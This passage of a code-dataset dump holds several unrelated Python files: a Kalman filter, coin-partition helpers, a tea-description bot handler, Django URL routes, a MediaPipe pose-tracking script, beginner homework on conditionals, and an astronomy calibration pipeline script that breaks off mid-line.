numpy.zeros(sz)\n\tz_int_error\t\t= numpy.zeros(sz)\n\n\tR = z_sigma**2 # estimate of measurement variance, change to see effect\n\n\t# intial guesses\n\txhat[0] = z[0]\n\tP[0] = 1e-1\n\n\tn_iter = len(z)\n\tfor k in range(1,n_iter):\n\t # time update\t\n\t xhatminus[k] \t= (xhat[k-1]) + (x_dt[k-1]+x_dt2[k-1])*dt\n\t Pminus[k] \t\t= P[k-1]+Q\n\n\t # measurement update\n\t K[k] \t\t= Pminus[k]/( Pminus[k]+R )\n\t xhat[k] \t= xhatminus[k]\t+\tK[k]*(z[k]-xhatminus[k])\n\t P[k] \t\t= (1-K[k])*Pminus[k]\n\n\t x_dt[k] \t= (xhat[k] - xhat[k-1])\t\t#first derivative\n\t x_dt2[k] \t= (x_dt[k] - x_dt[k-1])\t\t#second derivative\n\t z_dt[k] \t= (z[k] \t- z[k-1])\t\t#first derivative\n\t z_dt2[k] \t= (z_dt[k] - z_dt[k-1])\t\t#second derivative\n\n\t #x_integral[k] \t\t=\tx_integral[k-1]\t\t+ x[k]*dt \n\t xhat_integral[k] \t=\txhat_integral[k-1]\t+ xhat[k]*dt\n\t z_integral[k]\t\t=\tz_integral[k-1]\t\t+ z[k]*dt\n\t \n\t #xhat_int_error[k]\t=\tx_integral[k] - xhat_integral[k]\n\t #z_int_error[k]\t\t=\tx_integral[k] - z_integral[k]\n\n\treturn (xhat, xhat_integral, z_integral)\t ","sub_path":"kalman_func.py","file_name":"kalman_func.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"349485215","text":"from p078.coins.cache import get_piles_count\nfrom .helpers import cm\n\n\ndef sum_dependencies(deps):\n return sum(get_piles_count(**cm(dep)) for dep in deps)\n\n\ndef build_factor_dependencies(coins, factor, max=None):\n max = max if max is not None else coins\n\n if coins == factor:\n return [(0, 0)]\n\n min_for_factor = coins // (factor + 1)\n max_for_factor = coins // factor\n\n if min_for_factor == max_for_factor:\n return []\n\n # print(\n # \"The max/min for factor of {factor} is {max}/{min}.\".format(\n # factor=factor, max=max_for_factor, min=min_for_factor\n # )\n # )\n\n factor_deps = []\n remainder = coins % factor\n\n start = max_for_factor - min(max, max_for_factor)\n\n for i in range(start, max_for_factor - min_for_factor):\n size = remainder + i * factor\n factor_deps.append((size, size))\n\n # should_include = size + factor + max >= coins\n # if should_include:\n # else:\n # print(\"excluded\", size, factor, max, coins)\n\n next_max_size = max_for_factor - i - 1\n\n for j in range(1, factor):\n remaining_coins = coins + i * j - j * max_for_factor\n factor_deps.append((remaining_coins, next_max_size))\n\n # print(factor, factor_deps)\n\n return factor_deps\n\n\ndef build_dependencies(coins, max=None):\n max = max or coins\n deps = []\n\n for factor in range(1, coins + 1):\n factor_deps = build_factor_dependencies(coins, factor, max=max)\n deps += factor_deps\n\n return deps\n\n\ndef build_dependencies_slowly(coins, max):\n # populate dependencies\n current_size_values = range(0, coins, max)\n dependencies = set()\n\n if coins % max == 0:\n dependencies.add((0, 0))\n for i in current_size_values:\n if coins - i >= max - 1:\n dependencies.add((coins - i, max - 1))\n else:\n # don't want dependencies such as (2, 21) when that's equivalent to (2, 2)\n dependencies.add((coins - i, coins - i))\n\n return dependencies\n\n\ndef is_dirty(dep):\n (coins, max) = dep\n return coins != max\n","sub_path":"78/p078/coins/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"528298029","text":"from data_source import GREEN, WHITE, HELL_TURQUOIS, DARK_TURQUOIS, RED, SHEN, SHU, BLACK, YELLOW\nfrom Usecases import *\n\nTEA_DESCRIPTION = {\n GREEN: \"Зеленый чай самый бод��ящий\",\n WHITE: \"Белый - гербарий\",\n HELL_TURQUOIS: \"Светлый улун собирают в горах\",\n DARK_TURQUOIS: \"Темный улун любит Миша\",\n RED: \"Красный лучше пить осенью\",\n SHEN: \"Чем старше шен - тем он вкусней\",\n SHU: \"Шу Пуэр любит Лера\",\n BLACK: \"На черном чае можно увидеть плесень\",\n YELLOW: \"Желтый - очень дорогой\"\n}\n\n\ndef handle(message: str):\n text = message.lower()\n return TEA_DESCRIPTION[text]\n\n\npredicate = make_word_in_list_predicate([GREEN, WHITE, HELL_TURQUOIS, DARK_TURQUOIS, RED, SHEN, SHU, BLACK, YELLOW])\n\n\ndef commands():\n return None\n\n\ndef markup():\n return None\n","sub_path":"Usecases/category_description.py","file_name":"category_description.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"10774576","text":"from django.urls import path, re_path\n\nfrom .views import *\n\napp_name = 'foreground'\nurlpatterns = [\n re_path(r\"article/(?P\\d+)/(#.+)?\", article, name='article'),\n path(\"type_articles/\", type_articles, name='type_articles'),\n path(\"tag_articles/\", tag_articles, name='tag_articles'),\n path(\"commit_comment/\", commit_comment, name='comment'),\n]\n","sub_path":"foreground/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"114376786","text":"import cv2\nimport mediapipe as mp\nimport time\n\n'''for more info, visit:\nhttps://google.github.io/mediapipe/solutions/pose.html'''\n\ncap = cv2.VideoCapture('../PoseVideos/6.mp4')\n\ncTime=0\npTime=0\n\nmpPose = mp.solutions.pose #define the function path to .pose\npose = mpPose.Pose() #create an object from Pose()\nmpDraw = mp.solutions.drawing_utils\n\n\n\nwhile True:\n success, img = cap.read()\n #resize image to fit\n img = cv2.resize(img,(512,342),interpolation=cv2.INTER_AREA)\n\n\n #convert img\n imgRGB = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n result = pose.process(imgRGB)\n #print(result.pose_landmarks) #print out attributes for landmarks\n\n #draw pose frame\n if result.pose_landmarks:\n mpDraw.draw_landmarks(img,result.pose_landmarks,mpPose.POSE_CONNECTIONS)\n\n #get positional data\n for id, lm in enumerate(result.pose_landmarks.landmark):\n #print(id,lm)\n h, w, c = img.shape #height, width, channels\n cx, cy = int(lm.x*w), int(lm.y*h) #center width, center height\n \n if id ==0: #first landmark\n cv2.circle(img, (cx,cy), 5, (255,0,255), cv2.FILLED)\n\n\n\n #determine fps\n cTime = time.time()\n fps = 1/(cTime-pTime)\n pTime=cTime\n\n #display fps\n cv2.putText(img,str(int(fps)),(10,70),cv2.FONT_HERSHEY_PLAIN,3,\n (255,0,255),3)\n\n #display image\n cv2.imshow('Video',img)\n\n #if the d key is pressed, kill screen\n if cv2.waitKey(1) & 0xFF==ord('d'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"Lesson 4 - Hand and Body Tracking/2_1-pose_estimation_basics.py","file_name":"2_1-pose_estimation_basics.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"152149893","text":"# Enter a number between 1 and 20, save this value to number variable.\n# If number is greater than 0 and less than or equal to 7, save the number * 10 to result_1.\n# If number is greater than 7 and less than or equal to 15, save the result of floor division of the number divided by\n# 3 to result_1 variable\n# If number is greater than 15 and less than or equal to 20, save the number raised to the power 3 to result_1\n# Else save the text \"Wrong value\" to result_1\nresult_1 = None\nnumber = int(input(\"Enter a number 1 and 20 \"))\nif number > 0 and number < 7:\n result_1 = number *10\nelif number >7 and number <= 15:\n result_1 = (number// 3)\nelif number > 15 and number <= 20:\n result_1 = pow(number, 3)\n\nprint(result_1)\n\n\n\n# Enter two numbers between 1 and 10, save this values to number_1 variable and number_2 variables.\n# If number_1 and number_2 are greater than 0 and less than or equal to 5 save in the product of their multiplication\n# to result_2\n# If one of the variables (number_1 or number_2) is greater than 5 and less than or equal to 10, but the other isn't,\n# then save the sum of the two numbers to result_2\n# If both numbers are greater than 5 and less than or equal to 10, multiply their sum by 3 and save it to result_2\n# Else save the text \"Wrong values, try again\" to result_2\n\nnumber_1 = int(input(\"Enter a number between 1 and 10 \"))\nnumber_2 = int(input(\"Enter a number between 1 and 10 \"))\nresult_2 = None\nif 5 >= number_1 > 0 and 5 >= number_2 > 0:\n result_2 = (number_1* number_2)\nelif 5 < number_1 <= 10:\n if number_2 <= 5 or number_2 > 10:\n result_2 = (number_1 + number_2)\n elif 5 < number_2 <= 10:\n result_2 = (3* (number_1 + number_2))\nelse:\n result_2 = ('wrong values, try again')\nprint(result_2)\n\n\n\n# Enter your first name and save it to first_name variable,\n# then Enter last name and save it to last_name\n# If first_name or last_name are shorter than 6 characters, save a full name (with a space between) to result_3\n# Else save first_name to result_3 as many times as length of last_name value\nresult_3 = None\nfirst_name = input(\"Enter your first name \")\nlast_name = input(\"Enter your Last name \")\nif len(first_name) < 6 or len(last_name) <6:\n result_3 = (first_name + \"\" + last_name)\nelse:\n result_3 = (len(last_name) * first_name)\n\nprint(result_3)\n\n# Enter a random number. Save this value to random_number variable\n# If this number is less 10 or greater than 99, save the text \"Please, put in a number between 10 and 99\" to result_4\n# If a number doesn't meet the first condition, find the remainder of random_value divided by 2.\n# If it is 0, save the text \"Even number\" to result_4 , else save the message \"Odd number\"\nresult_4 = None\nrandom_number = int(input(\"Enter a random number \"))\nif random_number < 10 or random_number > 99:\n result_4 = (\"Please put a in a number between 10 and 99\")\n if (random_number % 2)== 0:\n result_4 = (\"Even number\")\n else:\n result_4 = (\"odd number\")\nprint(result_4)\n","sub_path":"lesson_2/homework_2_2.py","file_name":"homework_2_2.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"245479801","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\ncal_SLIT_spirou.py [night_directory] [files]\n\nFabry-Perot exposures in which the three fibres are simultaneously fed by light\nfrom the Fabry-Perot filter. Each exposure is used to build the slit\norientation. Finds the tilt of the orders.\n\nCreated on 2017-11-06 11:32\n\n@author: cook\n\nLast modified: 2017-12-11 at 15:09\n\nUp-to-date with cal_SLIT_spirou AT-4 V47\n\"\"\"\nfrom __future__ import division\nimport numpy as np\nimport os\nimport warnings\n\nfrom SpirouDRS import spirouDB\nfrom SpirouDRS import spirouConfig\nfrom SpirouDRS import spirouCore\nfrom SpirouDRS import spirouImage\nfrom SpirouDRS import spirouLOCOR\nfrom SpirouDRS import spirouStartup\nfrom SpirouDRS import spirouTHORCA\nfrom SpirouDRS import spirouEXTOR\n\n\n# =============================================================================\n# Define variables\n# =============================================================================\n# Name of program\n__NAME__ = 'cal_shape_master_spirou.py'\n# Get version and author\n__version__ = spirouConfig.Constants.VERSION()\n__author__ = spirouConfig.Constants.AUTHORS()\n__date__ = spirouConfig.Constants.LATEST_EDIT()\n__release__ = spirouConfig.Constants.RELEASE()\n__args__ = ['night_name', 'hcfile', 'fpfile']\n__required__ = [True, True, True]\n# Get Logging function\nWLOG = spirouCore.wlog\n# Get plotting functions\nsPlt = spirouCore.sPlt\n# Get parameter dictionary\nParamDict = spirouConfig.ParamDict\n# force plot off\nPLOT_PER_ORDER = False\n\n\n# =============================================================================\n# Define functions\n# =============================================================================\ndef main(night_name=None, hcfile=None, fpfiles=None):\n \"\"\"\n cal_SLIT_spirou.py main function, if night_name and files are None uses\n arguments from run time i.e.:\n cal_SLIT_spirou.py [night_directory] [files]\n\n :param night_name: string or None, the folder within data raw directory\n containing files (also reduced directory) i.e.\n /data/raw/20170710 would be \"20170710\" but\n /data/raw/AT5/20180409 would be \"AT5/20180409\"\n :param files: string, list or None, the list of files to use for\n arg_file_names and fitsfilename\n (if None assumes arg_file_names was set from run time)\n\n :return ll: dictionary, containing all the local variables defined in\n main\n \"\"\"\n # ----------------------------------------------------------------------\n # Set up\n # ----------------------------------------------------------------------\n # get parameters from config files/run time args/load paths + calibdb\n p = spirouStartup.Begin(recipe=__NAME__)\n if hcfile is None or fpfiles is None:\n names, types = ['hcfile', 'fpfiles'], [str, str]\n customargs = spirouStartup.GetCustomFromRuntime(p, [0, 1], types, names,\n last_multi=True)\n else:\n customargs = dict(hcfile=hcfile, fpfile=fpfiles)\n\n # get parameters from configuration files and run time arguments\n p = spirouStartup.LoadArguments(p, night_name, customargs=customargs,\n mainfitsfile='fpfiles')\n\n # ----------------------------------------------------------------------\n # Construct reference filename and get fiber type\n # ----------------------------------------------------------------------\n p, hcfitsfilename = spirouStartup.SingleFileSetup(p, filename=p['HCFILE'])\n p, fpfitsfiles = spirouStartup.MultiFileSetup(p, files=p['FPFILES'])\n # set fiber (it doesn't matter with the 2D image but we need this to get\n # the lamp type for FPFILES and HCFILES, AB == C\n p['FIBER'] = 'AB'\n p['FIB_TYP'] = [p['FIBER']]\n fsource = __NAME__ + '/main()'\n p.set_sources(['FIBER', 'FIB_TYP'], fsource)\n\n # ----------------------------------------------------------------------\n # Once we have checked the e2dsfile we can load calibDB\n # ----------------------------------------------------------------------\n # as we have custom arguments need to load the calibration database\n p = spirouStartup.LoadCalibDB(p)\n\n # add a force plot off\n p['PLOT_PER_ORDER'] = PLOT_PER_ORDER\n p.set_source('PLOT_PER_ORDER', __NAME__ + '.main()')\n\n # ----------------------------------------------------------------------\n # Read FP and HC files\n # ----------------------------------------------------------------------\n # read input fp and hc data\n rkwargs = dict(filename=fpfitsfiles[0], filenames=fpfitsfiles[1:],\n framemath='add')\n p, fpdata, fphdr = spirouImage.ReadImageAndCombine(p, **rkwargs)\n\n hcdata, hchdr, _, _ = spirouImage.ReadImage(p, hcfitsfilename)\n\n # add data and hdr to loc\n loc = ParamDict()\n loc['HCDATA'], loc['HCHDR'] = hcdata, hchdr\n loc['FPDATA'], loc['FPHDR'] = fpdata, fphdr\n # set the source\n sources = ['HCDATA', 'HCHDR']\n loc.set_sources(sources, 'spirouImage.ReadImage()')\n sources = ['FPDATA', 'FPHDR']\n loc.set_sources(sources, 'spirouImage.ReadImage()')\n\n # ---------------------------------------------------------------------\n # fix for un-preprocessed files\n # ----------------------------------------------------------------------\n hcdata = spirouImage.FixNonPreProcess(p, hcdata)\n fpdata = spirouImage.FixNonPreProcess(p, fpdata)\n\n # ----------------------------------------------------------------------\n # Once we have checked the e2dsfile we can load calibDB\n # ----------------------------------------------------------------------\n # as we have custom arguments need to load the calibration database\n p = spirouStartup.LoadCalibDB(p)\n\n # add a force plot off\n p['PLOT_PER_ORDER'] = PLOT_PER_ORDER\n p.set_source('PLOT_PER_ORDER', __NAME__ + '.main()')\n\n # ----------------------------------------------------------------------\n # Get basic image properties for reference file\n # ----------------------------------------------------------------------\n # get sig det value\n p = spirouImage.GetSigdet(p, fphdr, name='sigdet')\n # get exposure time\n p = spirouImage.GetExpTime(p, fphdr, name='exptime')\n # get gain\n p = spirouImage.GetGain(p, fphdr, name='gain')\n # get lamp parameters\n p = spirouTHORCA.GetLampParams(p, hchdr)\n # get FP_FP DPRTYPE\n p = spirouImage.ReadParam(p, fphdr, 'KW_DPRTYPE', 'DPRTYPE', dtype=str)\n\n\n # ----------------------------------------------------------------------\n # Correction of reference FP\n # ----------------------------------------------------------------------\n # set the number of frames\n p['NBFRAMES'] = len(fpfitsfiles)\n p.set_source('NBFRAMES', __NAME__ + '.main()')\n # Correction of DARK\n p, fpdatac = spirouImage.CorrectForDark(p, fpdata, fphdr)\n # Resize hc data\n # rotate the image and convert from ADU/s to e-\n fpdata = spirouImage.ConvertToE(spirouImage.FlipImage(p, fpdatac), p=p)\n # resize image\n bkwargs = dict(xlow=p['IC_CCDX_LOW'], xhigh=p['IC_CCDX_HIGH'],\n ylow=p['IC_CCDY_LOW'], yhigh=p['IC_CCDY_HIGH'],\n getshape=False)\n fpdata1 = spirouImage.ResizeImage(p, fpdata, **bkwargs)\n # log change in data size\n WLOG(p, '',\n ('FPref Image format changed to {0}x{1}').format(*fpdata1.shape))\n # Correct for the BADPIX mask (set all bad pixels to zero)\n bargs = [p, fpdata1, fphdr]\n p, fpdata1 = spirouImage.CorrectForBadPix(*bargs)\n p, badpixmask = spirouImage.CorrectForBadPix(*bargs, return_map=True)\n # log progress\n WLOG(p, '', 'Cleaning FPref hot pixels')\n # correct hot pixels\n fpdata1 = spirouEXTOR.CleanHotpix(fpdata1, badpixmask)\n # add to loc\n loc['FPDATA1'] = fpdata1\n loc.set_source('FPDATA1', __NAME__ + '.main()')\n # Log the number of dead pixels\n # get the number of bad pixels\n with warnings.catch_warnings(record=True) as _:\n n_bad_pix = np.nansum(fpdata1 <= 0)\n n_bad_pix_frac = n_bad_pix * 100 / np.product(fpdata1.shape)\n # Log number\n wmsg = 'Nb FPref dead pixels = {0} / {1:.2f} %'\n WLOG(p, 'info', wmsg.format(int(n_bad_pix), n_bad_pix_frac))\n\n # ----------------------------------------------------------------------\n # Correction of HC\n # ----------------------------------------------------------------------\n # set the number of frames\n p['NBFRAMES'] = 1\n p.set_source('NBFRAMES', __NAME__ + '.main()')\n # Correction of DARK\n p, hcdatac = spirouImage.CorrectForDark(p, hcdata, hchdr)\n # Resize hc data\n # rotate the image and convert from ADU/s to e-\n hcdata = spirouImage.ConvertToE(spirouImage.FlipImage(p, hcdatac), p=p)\n # resize image\n bkwargs = dict(xlow=p['IC_CCDX_LOW'], xhigh=p['IC_CCDX_HIGH'],\n ylow=p['IC_CCDY_LOW'], yhigh=p['IC_CCDY_HIGH'],\n getshape=False)\n hcdata1 = spirouImage.ResizeImage(p, hcdata, **bkwargs)\n # log change in data size\n WLOG(p, '',\n ('HC Image format changed to {0}x{1}').format(*hcdata1.shape))\n # Correct for the BADPIX mask (set all bad pixels to zero)\n bargs = [p, hcdata1, hchdr]\n p, hcdata1 = spirouImage.CorrectForBadPix(*bargs)\n p, badpixmask = spirouImage.CorrectForBadPix(*bargs, return_map=True)\n # log progress\n WLOG(p, '', 'Cleaning HC hot pixels')\n # correct hot pixels\n hcdata1 = spirouEXTOR.CleanHotpix(hcdata1, badpixmask)\n # add to loc\n loc['HCDATA1'] = hcdata1\n loc.set_source('HCDATA1', __NAME__ + '.main()')\n # Log the number of dead pixels\n # get the number of bad pixels\n with warnings.catch_warnings(record=True) as _:\n n_bad_pix = np.nansum(hcdata1 <= 0)\n n_bad_pix_frac = n_bad_pix * 100 / np.product(hcdata1.shape)\n # Log number\n wmsg = 'Nb HC dead pixels = {0} / {1:.2f} %'\n WLOG(p, 'info', wmsg.format(int(n_bad_pix), n_bad_pix_frac))\n\n # -------------------------------------------------------------------------\n # get all FP_FP files\n # -------------------------------------------------------------------------\n fpfilenames = spirouImage.FindFiles(p, filetype=p['DPRTYPE'],\n allowedtypes=p['ALLOWED_FP_TYPES'])\n # convert filenames to a numpy array\n fpfilenames = np.array(fpfilenames)\n # julian date to know which file we need to\n # process together\n fp_time = np.zeros(len(fpfilenames))\n basenames, fp_exp, fp_pp_version, nightnames = [], [], [], []\n # log progress\n WLOG(p, '', 'Reading all fp file headers')\n # looping through the file headers\n for it in range(len(fpfilenames)):\n # log progress\n wmsg = '\\tReading file {0} / {1}'\n WLOG(p, 'info', wmsg.format(it + 1, len(fpfilenames)))\n # get fp filename\n fpfilename = fpfilenames[it]\n # get night name\n night_name = os.path.dirname(fpfilenames[it]).split(p['TMP_DIR'])[-1]\n # read data\n data_it, hdr_it, _, _ = spirouImage.ReadImage(p, fpfilename)\n # get header\n hdr = spirouImage.ReadHeader(p, filepath=fpfilenames[it])\n # add MJDATE to dark times\n fp_time[it] = float(hdr[p['KW_ACQTIME'][0]])\n # add other keys (for tabular output)\n basenames.append(os.path.basename(fpfilenames[it]))\n nightnames.append(night_name)\n fp_exp.append(float(hdr[p['KW_EXPTIME'][0]]))\n fp_pp_version.append(hdr[p['KW_PPVERSION'][0]])\n\n # -------------------------------------------------------------------------\n # match files by date\n # -------------------------------------------------------------------------\n # log progress\n wmsg = 'Matching FP files by observation time (+/- {0} hrs)'\n WLOG(p, '', wmsg.format(p['DARK_MASTER_MATCH_TIME']))\n # get the time threshold\n time_thres = p['FP_MASTER_MATCH_TIME']\n # get items grouped by time\n matched_id = spirouImage.GroupFilesByTime(p, fp_time, time_thres)\n\n # -------------------------------------------------------------------------\n # construct the master fp file (+ correct for dark/badpix)\n # -------------------------------------------------------------------------\n cargs = [fpdata1, fpfilenames, matched_id]\n fpcube, transforms = spirouImage.ConstructMasterFP(p, *cargs)\n # log process\n wmsg1 = 'Master FP construction complete.'\n wmsg2 = '\\tAdding {0} group images to form FP master image'\n WLOG(p, 'info', [wmsg1, wmsg2.format(len(fpcube))])\n # sum the cube to make fp data\n masterfp = np.sum(fpcube, axis=0)\n # add to loc\n loc['MASTERFP'] = masterfp\n loc.set_source('MASTERFP', __NAME__ + '.main()')\n\n # ------------------------------------------------------------------\n # Get localisation coefficients\n # ------------------------------------------------------------------\n # original there is a loop but it is not used --> removed\n p = spirouImage.FiberParams(p, p['FIBER'], merge=True)\n # get localisation fit coefficients\n p, loc = spirouLOCOR.GetCoeffs(p, fphdr, loc)\n\n # ------------------------------------------------------------------\n # Get master wave solution map\n # ------------------------------------------------------------------\n # get master wave map\n masterwavefile = spirouDB.GetDatabaseMasterWave(p)\n # log process\n wmsg1 = 'Getting master wavelength grid'\n wmsg2 = '\\tFile = {0}'.format(os.path.basename(masterwavefile))\n WLOG(p, '', [wmsg1, wmsg2])\n # Force A and B to AB solution\n if p['FIBER'] in ['A', 'B']:\n wave_fiber = 'AB'\n else:\n wave_fiber = p['FIBER']\n # read master wave map\n wout = spirouImage.GetWaveSolution(p, filename=masterwavefile,\n return_wavemap=True, quiet=True,\n return_header=True, fiber=wave_fiber)\n loc['MASTERWAVEP'], loc['MASTERWAVE'] = wout[:2]\n loc['MASTERWAVEHDR'], loc['WSOURCE'] = wout[2:]\n # set sources\n wsource = ['MASTERWAVEP', 'MASTERWAVE', 'MASTERWAVEHDR']\n loc.set_sources(wsource, 'spirouImage.GetWaveSolution()')\n\n # ----------------------------------------------------------------------\n # Read UNe solution\n # ----------------------------------------------------------------------\n wave_u_ne, amp_u_ne = spirouImage.ReadLineList(p)\n loc['LL_LINE'], loc['AMPL_LINE'] = wave_u_ne, amp_u_ne\n source = __NAME__ + '.main() + spirouImage.ReadLineList()'\n loc.set_sources(['LL_LINE', 'AMPL_LINE'], source)\n\n # ----------------------------------------------------------------------\n # Read cavity length file\n # ----------------------------------------------------------------------\n loc['CAVITY_LEN_COEFFS'] = spirouImage.ReadCavityLength(p)\n source = __NAME__ + '.main() + spirouImage.ReadCavityLength()'\n loc.set_source('CAVITY_LEN_COEFFS', source)\n\n # ----------------------------------------------------------------------\n # Calculate shape map\n # ----------------------------------------------------------------------\n # calculate dx map\n loc = spirouImage.GetXShapeMap(p, loc)\n # if dx map is None we shouldn't continue\n if loc['DXMAP'] is None:\n fargs = [loc['MAXDXMAPINFO'][0], loc['MAXDXMAPINFO'][1],\n loc['MAXDXMAPSTD'], p['SHAPE_QC_DXMAP_STD']]\n fmsg = ('The std of the dxmap for order {0} y-pixel {1} is too large.'\n ' std = {2} (limit = {3})'.format(*fargs))\n wmsg = 'QUALITY CONTROL FAILED: {0}'\n WLOG(p, 'warning', wmsg.format(fmsg))\n WLOG(p, 'warning', 'Cannot continue. Exiting.')\n # End Message\n p = spirouStartup.End(p)\n # return a copy of locally defined variables in the memory\n return dict(locals())\n\n # calculate dymap\n loc = spirouImage.GetYShapeMap(p, loc, fphdr)\n\n # ------------------------------------------------------------------\n # Need to straighten the dxmap\n # ------------------------------------------------------------------\n # copy it first\n loc['DXMAP0'] = np.array(loc['DXMAP'])\n # straighten it\n loc['DXMAP'] = spirouImage.EATransform(loc['DXMAP'], dymap=loc['DYMAP'])\n\n # ------------------------------------------------------------------\n # Need to straighten the hc data and fp data for debug\n # ------------------------------------------------------------------\n # log progress\n WLOG(p, '', 'Shape finding complete. Applying transforms.')\n # apply very last update of the debananafication\n tkwargs = dict(dxmap=loc['DXMAP'], dymap=loc['DYMAP'])\n loc['HCDATA2'] = spirouImage.EATransform(loc['HCDATA1'], **tkwargs)\n loc['FPDATA2'] = spirouImage.EATransform(loc['FPDATA1'], **tkwargs)\n loc.set_sources(['HCDATA2', 'FPDATA2'], __NAME__ + '.main()')\n\n # ------------------------------------------------------------------\n # Plotting\n # ------------------------------------------------------------------\n if p['DRS_PLOT'] > 0:\n # plots setup: start interactive plot\n sPlt.start_interactive_session(p)\n # plot the shape process for one order\n sPlt.slit_shape_angle_plot(p, loc)\n # end interactive section\n sPlt.end_interactive_session(p)\n\n # ----------------------------------------------------------------------\n # Quality control\n # ----------------------------------------------------------------------\n # TODO: Decide on some quality control criteria?\n # set passed variable and fail message list\n passed, fail_msg = True, []\n qc_values, qc_names, qc_logic, qc_pass = [], [], [], []\n # finally log the failed messages and set QC = 1 if we pass the\n # quality control QC = 0 if we fail quality control\n if passed:\n WLOG(p, 'info', 'QUALITY CONTROL SUCCESSFUL - Well Done -')\n p['QC'] = 1\n p.set_source('QC', __NAME__ + '/main()')\n else:\n for farg in fail_msg:\n wmsg = 'QUALITY CONTROL FAILED: {0}'\n WLOG(p, 'warning', wmsg.format(farg))\n p['QC'] = 0\n p.set_source('QC', __NAME__ + '/main()')\n # add to qc header lists\n qc_values.append(loc['MAXDXMAPSTD'])\n qc_names.append('DXMAP STD')\n qc_logic.append('DXMAP STD < {0}'.format(p['SHAPE_QC_DXMAP_STD']))\n qc_pass.append(1)\n # store in qc_params\n qc_params = [qc_names, qc_values, qc_logic, qc_pass]\n\n # ------------------------------------------------------------------\n # Writing FP big table\n # ------------------------------------------------------------------\n # construct big fp table\n colnames = ['FILENAME', 'NIGHT', 'MJDATE', 'EXPTIME', 'PVERSION',\n 'GROUPID', 'DXREF', 'DYREF', 'A', 'B', 'C', 'D']\n values = [basenames, nightnames, fp_time, fp_exp, fp_pp_version,\n matched_id, transforms[:, 0], transforms[:, 1],\n transforms[:, 2], transforms[:, 3], transforms[:, 4],\n transforms[:, 5]]\n fptable = spirouImage.MakeTable(p, colnames, values)\n\n # ------------------------------------------------------------------\n # Writing DXMAP to file\n # ------------------------------------------------------------------\n # get the raw tilt file name\n raw_shape_file = os.path.basename(p['FITSFILENAME'])\n # construct file name and path\n shapexfits, tag = spirouConfig.Constants.SLIT_XSHAPE_FILE(p)\n shapexfitsname = os.path.basename(shapexfits)\n # Log that we are saving tilt file\n wmsg = 'Saving shape x information in file: {0}'\n WLOG(p, '', wmsg.format(shapexfitsname))\n # Copy keys from fits file\n hdict = spirouImage.CopyOriginalKeys(fphdr)\n # add version number\n hdict = spirouImage.AddKey(p, hdict, p['KW_VERSION'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_DRS_DATE'], value=p['DRS_DATE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_DATE_NOW'], value=p['DATE_NOW'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_PID'], value=p['PID'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag)\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBDARK'], value=p['DARKFILE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBBAD'], value=p['BADPFILE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBLOCO'], value=p['LOCOFILE'])\n hdict = spirouImage.AddKey1DList(p, hdict, p['KW_INFILE1'],\n dim1name='hcfile', values=p['HCFILE'])\n hdict = spirouImage.AddKey1DList(p, hdict, p['KW_INFILE2'],\n dim1name='fpfile', values=p['FPFILES'])\n # add qc parameters\n hdict = spirouImage.AddKey(p, hdict, p['KW_DRS_QC'], value=p['QC'])\n hdict = spirouImage.AddQCKeys(p, hdict, qc_params)\n # write tilt file to file\n p = spirouImage.WriteImageTable(p, shapexfits, image=loc['DXMAP'],\n table=fptable, hdict=hdict)\n\n # ------------------------------------------------------------------\n # Writing DYMAP to file\n # ------------------------------------------------------------------\n # get the raw tilt file name\n raw_shape_file = os.path.basename(p['FITSFILENAME'])\n # construct file name and path\n shapeyfits, tag = spirouConfig.Constants.SLIT_YSHAPE_FILE(p)\n shapeyfitsname = os.path.basename(shapeyfits)\n # Log that we are saving tilt file\n wmsg = 'Saving shape y information in file: {0}'\n WLOG(p, '', wmsg.format(shapeyfitsname))\n # Copy keys from fits file\n hdict = spirouImage.CopyOriginalKeys(fphdr)\n # add version number\n hdict = spirouImage.AddKey(p, hdict, p['KW_VERSION'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_DRS_DATE'], value=p['DRS_DATE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_DATE_NOW'], value=p['DATE_NOW'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_PID'], value=p['PID'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_OUTPUT'], value=tag)\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBDARK'], value=p['DARKFILE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBBAD'], value=p['BADPFILE'])\n hdict = spirouImage.AddKey(p, hdict, p['KW_CDBLOCO'], value=p['LOCOFILE'])\n hdict = spirouImage.AddKey1DList(p, hdict, p['KW_INFILE1'],\n dim1name='hcfile', values=p['HCFILE'])\n hdict = spirouImage.AddKey1DList(p, hdict, p['KW_INFILE2'],\n dim1name='fpfile', values=p['FPFILES'])\n # add qc parameters\n hdict = spirouImage.AddKey(p, hdict, p['KW_DRS_QC'], value=p['QC'])\n hdict = spirouImage.AddQCKeys(p, hdict, qc_params)\n # write tilt file to file\n p = spirouImage.WriteImageTable(p, shapeyfits, image=loc['DYMAP'],\n table=fptable, hdict=hdict)\n\n # ------------------------------------------------------------------\n # Writing Master FP to file\n # ------------------------------------------------------------------\n # get the raw tilt file name\n raw_shape_file = 